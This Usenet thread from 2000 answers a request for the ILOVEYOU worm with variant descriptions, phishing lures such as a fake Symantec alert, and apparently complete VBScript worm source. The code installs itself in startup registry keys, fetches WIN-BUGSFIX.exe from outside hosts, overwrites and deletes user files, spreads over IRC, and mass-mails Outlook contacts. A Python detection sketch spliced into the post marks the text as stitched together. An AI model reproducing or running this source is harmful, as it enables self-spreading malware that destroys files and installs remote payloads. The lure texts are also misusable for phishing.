
Anyone has the code for the I Love You virus?


Yair Kuszpet

09.05.2000, 03:00:00
Or can anyone explain what it actually does?


Peter

09.05.2000, 03:00:00
1) The Variations
2) My Description
3) The Source Code!

Compiled by...
Peter

1) --The Variations --------------------------------------------

VARIANT: LoveLetter.B
This variant uses another message subject when it spreads:
Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
The subject field is Lithuanian and means "Let's meet this evening for a cup
of coffee..."
LoveLetter.B contains the following comments in its code:
Modified Lameris Tamoshius / Lithuania (Tovi systems)


VARIANT: LoveLetter.C
This variant propagates in a message with
Subject: fwd: Joke
Attachment: Very Funny.vbs


VARIANT: LoveLetter.D
This variant is a slightly modified variant from VBS/LoveLetter.A.


VARIANT: LoveLetter.E
VBS/LoveLetter.E spreads itself in a message that is as follows:
Subject: Mothers Day Order Confirmation
Body: We have proceeded to charge your credit card for the
amount of $326.92 for the mothers day diamond special.
We have attached a detailed invoice to this email.
Please print out the attachment and keep it in a safe
place.Thanks Again and Have a Happy Mothers Day!
mothe...@subdimension.com
Attachment: mothersday.vbs
Additionally, this variant deletes all files with the extension ".ini" and
".bat" instead of ".jpg" and ".jpeg".
This variant does not attempt to download the "WIN-BUGSFIX.exe" from the
Internet, however it modifies the Internet Explorer start page.


VARIANT: LoveLetter.F
This variant spreads in email with the following content:
Subject: Dangerous Virus Warning
Body: There is a dangerous virus circulating. Please click
attached picture to view it and learn to avoid it.
Attachment: virus_warning.jpg.vbs


VARIANT: LoveLetter.G
VBS/LoveLetter.G is similar to the original VBS/LoveLetter.A.
This variant sends a message that seems to originate from Symantec's
support. This is not true. The message looks like the following:
Subject: Virus ALERT!!!
From: sup...@symantec.com
Body: Dear Symantec customer,

Symantec's AntiVirus Research Center began receiving
reports regarding VBS.LoveLetter.A virus early morning on
May 4, 2000 GMT.
This worm appears to originate from the Asia Pacific
region. Distribution of the virus is widespread and
hundreds of thousands of machines are reported infected.
The VBS.LoveLetter.A is an Internet worm that uses
Microsoft Outlook to e-mail itself as an attachment.
The subject line of the e-mail reads ILOVEYOU, with the
attachment titled LOVE-LETTER-FOR-YOU.TXT.VBS. Once the
attachment is opened, the virus replicates and sends an
e-mail to all e-mail addresses listed in the address book.
The virus also spreads itself via Internet relay chat and
infects files on local and remote drives including files
with extensions vbs, vbe, js, sje, css, wsh, sct, hta, jpg,
jpeg, mp3, mp2.
Users should exercise caution when opening e-mails with
this subject line, even if the e-mail is from someone they
know, as that is how the virus is spread.
Symantec Corp. today announced availability of the virus
definition to detect, repair and protect users against the
VBS.LoveLetter.A virus.
This definition is available now via Symantec's LiveUpdate
and can also be downloaded from the following web sites:
http://www.symantecstore.com/AF74211/promo/loveletter
http://www.digitalriver.com/symantec


Also as a quick solution Symantec Corp. offers Visual Basic
Script to protect your PC against this worm. (See
attached.)


Note! When executed, this script will protect Your PC from
being INFECTED by VBS.LoveLetter.A virus.


To cure already infected PC's download Norton Antivirus
Updates mentioned above.


Symantec Corporation - a world leader in internet security
technology.

Attachment: protect.vbs

This variant changes the Internet Explorer start page pointing to an adult
site. The default search page is set to point to a hacker site.
For the files with the following extensions: ".js", ".jse", ".css", ".wsh",
".sct", ".hta", ".com" and ".bat", the virus will create a new file with the
same name, but using the extension ".vbs". The original file will be
deleted. Since all ".com" files are removed, the system cannot be restarted
any longer.
This variant does not attempt to download the "WIN-BUGSFIX.exe".


VARIANT: LoveLetter.H
VBS/LoveLetter.H is a slightly modified variant of VBS/LoveLetter.A.


VARIANT: LoveLetter.I
This variant spreads in emails with the following content:
Subject: Important ! Read carefully !!
Body: Check the attached IMPORTANT coming from me !
Attachment: IMPORTANT.TXT.vbs


VARIANT: LoveLetter.J
VBS/LoveLetter.J is a slightly modified variant of VBS/LoveLetter.G.


VARIANT: LoveLetter.K
This variant is functionally identical with VBS/LoveLetter.A. However, the
email message and the attachment name have been modified.
VBS/LoveLetter.K sends messages with the following content:
Subject: How to protect yourself from the IL0VEY0U bug!
Body: Here's the easy way to fix the love virus.
Attachment: Virus-Protection-Instructions.vbs

2) ---My Description-------------------------------------------

It has several subs (in order in the file, not in order when run)....
Sub 1: regruns()
1) Declare variables
2) Stop it timing out
3) Copy itself into the windows folder as MSKernel32.vbs, Win32DLL.vbs &
LOVE-LETTER-FOR-YOU.TXT.vbs
4) Set it to run those files every time the computer starts up
5) Set the Startup page for Internet Explorer to a webserver that has
WIN-BUGSFIX.exe on it.
6) Downloads a file called WIN-BUGSFIX.exe
7) Copies this file to the windows folder & sets it to run at startup

Sub 2: listadriv()
1) Declare Variables
2) Get the next drive letter
3) Return the drive letter to continue

Sub 3: infectfiles()
1) Declare Variables
2) Search for all .vbs, .vbe or .js, .jse, .css or .jpg, .jpeg or .mp3,
.mp2
3) When it finds one, it puts itself either in place or adds itself to
that file and continues the search

4) If it finds the IRC Application called 'mirc32.exe', it writes the
following into the 'script.ini':
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick ((the dir path here)) \LOVE-LETTER-FOR-YOU.HTM
n3=}

Sub 4: folderlist()
1) Declare Variables
2) Gets all folders in a specified path & starts the sub to infect them

Sub 5: regcreate()
1) Declare Variables
2) Write to a registry Key

Sub 7: regget()
1) Declare Variables
2) Read a registry Key

Sub 8: fileexist()
1) Declare Variables
2) Check if file exists
3) Return if file exists

Sub 9: spreadtoemail() <-- THE 'WORM' PART
1) Declare Variables
2) Load the "Outlook.Application"
3) Go through each name in address list...
4) Create a message with... Subject as: ILOVEYOU, Message as: "kindly check
the attached LOVELETTER coming from me." & Adds an attachment from the
windows folder - LOVE-LETTER-FOR-YOU.TXT.vbs
5) Adds that to the registry to send it.

Sub 10: html() <-- THE 'WORM' PART
1) Declare Variables
2) This is just a long string of the HTML code "<HTML><HEAD><TITLE>LOV"...
and so on
3) Creates LOVE-LETTER-FOR-YOU.HTM in the windows folder

3) ---The Source Code! -------------------------------------------

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / isp...@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()

END REM <-- THIS LINE DISABLES THE VIRUS RUNNING. (Added by me but not
tested!)


On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? isp...@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-...@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-...@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
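
Added example, not part of Peter's post or of the worm's code: the variants listed above change subject and body freely, but every one arrives as an attachment whose final extension is a script type that runs on double-click, often behind a decoy extension such as .TXT or .jpg. This Python sketch of a mail-gateway check keys on that invariant; the extension sets, function names and sample messages are assumptions constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Script types that run on double-click (the .vbs attachments and the
# script extensions the post lists); assumed set, extend as needed.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta"}
# Harmless-looking decoy extensions placed before the real one (assumed set).
DECOY_EXTS = {"txt", "jpg", "jpeg", "gif", "doc", "pdf", "mp3", "htm", "html"}


def classify_filename(name):
    """Return 'double-extension', 'script' or None for an attachment name."""
    # Windows drops trailing dots and spaces, so "x.vbs. " still runs as .vbs.
    parts = name.strip().rstrip(". ").lower().split(".")
    if len(parts) < 2 or parts[-1] not in SCRIPT_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        return "double-extension"
    return "script"


def scan_message(raw):
    """Parse one raw message (bytes); return [(verdict, filename), ...]."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        verdict = classify_filename(name) if name else None
        if verdict:
            findings.append((verdict, name))
    return findings


def build_sample(subject, filename):
    """Constructed sample message; the attachment is an inert placeholder."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "a@example.com", "b@example.com", subject
    m.set_content("kindly check the attached LOVELETTER coming from me.")
    m.add_attachment(b"placeholder bytes, not script code",
                     maintype="application", subtype="octet-stream",
                     filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    for subj, fname in [("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
                        ("fwd: Joke", "Very Funny.vbs"),
                        ("Dangerous Virus Warning", "virus_warning.jpg.vbs"),
                        ("minutes", "minutes.txt")]:
        print(subj, "->", scan_message(build_sample(subj, fname)) or "clean")
```

Matching on the attachment's final extension catches all the listed variants regardless of subject line, which is why filtering on "ILOVEYOU" alone stopped working as soon as LoveLetter.B appeared.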

Larry Linson

10.05.2000, 03:00:00

Yair Kuszpet <yai...@netvision.net.il> wrote:
> Or can anyone explain what it actually does?

As it is said to be executable vbscript code included in the e-mail, it
would appear that several millions of people have the code... anyone
who's received it in any of its various mutations.

--
L. M. (Larry) Linson
Access example databases at http://homestead.deja.com/user.accdevel
New: Book reviews, previously published in North Texas PC News
Script execution must be enabled and Windows set to Small Fonts


